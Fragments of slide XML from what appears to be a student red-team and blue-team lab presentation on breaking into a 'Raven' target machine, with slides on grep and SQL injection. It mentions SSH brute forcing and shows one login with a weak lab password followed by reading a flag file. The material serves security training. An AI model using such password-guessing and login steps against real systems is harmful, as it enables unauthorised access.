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Inconsolata"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
      <p:italic r:id="rId42"/>
      <p:boldItalic r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald"/>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regular.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-italic.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-bold.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-bold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Inconsolata-bold.fntdata"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolat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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Clock_signal" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Clock_signal" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Main_storage" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Main_storage" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bit-serial_architecture" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Numerical_digit" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Magnetostrictive" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Magnetostrictive" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Delay_line_memory" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Delay_line_memory" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bit-serial_architecture" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Drum_memory" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bit" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Drum_memory" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bit" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Numerical_digit"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3104b973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3104b973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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Grep with options </a:t>
            </a:r>
            <a:endParaRPr>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rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> -R, --dereference-recursive</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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          	Read all files under each directory,  recursively.   Follow  all</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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          	symbolic links, unlike -r.</a:t>
            </a:r>
            <a:endParaRPr>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45720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+Regex: sequence of characters that define a search pattern”</a:t>
            </a:r>
            <a:endParaRPr>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2f83222a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2f83222a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next slide for methods used…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2f83222a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2f83222a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2f83222a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2f83222a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Incorrectly filtered escape characters: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This kind of injection occurs when the input data is not filtered correctly for escape characters and then is executed by the SQL engine.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2f83222a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2f83222a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2f83222a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92f83222a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Pseudo-terminals are emulators for serial lines. They provide endpoints for telnet, ssh, and xterm shells.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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serial computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is a</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computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> typified by</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bit-serial architecture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (send data one bit at a time, along a single wire,)– i.e., internally operating on one</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bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or</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digit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for each</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clock cycle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Machines with serial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId12">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>main storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> devices such as acoustic or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId14">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>magnetostrictive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId16">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>delay lines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId18">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>rotating magnetic devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> were usually serial computers.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2f83222a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2f83222a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2f83222a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2f83222a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329062e0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329062e0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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a8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92f83222a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92f83222a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2f83222a8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2f83222a8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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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2f83222a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92f83222a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92f83222a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2f83222a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2f83222a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2f83222a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2f83222a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3.jp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192.168.1.115/"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cve.mitre.org/index.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Emotet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Team</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Google Shape;63;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1468825"/>
            <a:ext cx="2623200" cy="23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Red Team:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Phil Okamoto</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lance Magnanao</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Kaushal Raj</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Google Shape;64;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3084000" y="1468825"/>
            <a:ext cx="2554500" cy="20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Blue Team:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Douglas Yee</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Kent Hong</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Constantine</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Politis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Google Shape;65;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702400" y="1468825"/>
            <a:ext cx="2505000" cy="18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Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Network:</a:t>
            </a:r>
            <a:endParaRPr b="1">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b="1">
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Source Code Pro"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Prithvi Jagannath</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Source Code Pro"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Henry Lueders</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Source Code Pro"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>Moses Kim</a:t>
            </a:r>
            <a:endParaRPr>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900">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Breaking into Target 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Raven Machine</a:t>
            </a:r>
            <a:endParaRPr sz="59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SSH brute forcing/guessing</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Google Shape;127;p2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oboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The Red Team was able to penetrate Target 1 and retrieve the following confidential data(represented as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr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Flag 2</a:t>
            </a:r>
            <a:endParaRPr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Exploitation Process</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SSH into User Account</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u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F4CCCC"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ssh michael@192.168.1.110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F4CCCC"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>(password: michael) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>(Weak Password Vulnerability)</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u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cd /var/www</a:t>
            </a:r>
            <a:endParaRPr sz="1100" u="sng">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u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cat flag2.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> &lt;- command used to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cat out/exfil data on flag 2</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128" name="Google Shape;128;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292125" y="1953250"/>
            <a:ext cx="2905125" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="Google Shape;129;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="866750" y="3576263"/>
            <a:ext cx="3219450" cy="1419225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="Google Shape;130;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4642200" y="1828625"/>
            <a:ext cx="4102150" cy="316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Looking through michael’s account.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p2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oboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The Red Team was able to penetrate Target 1 and retrieve the following confidential data(represented as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
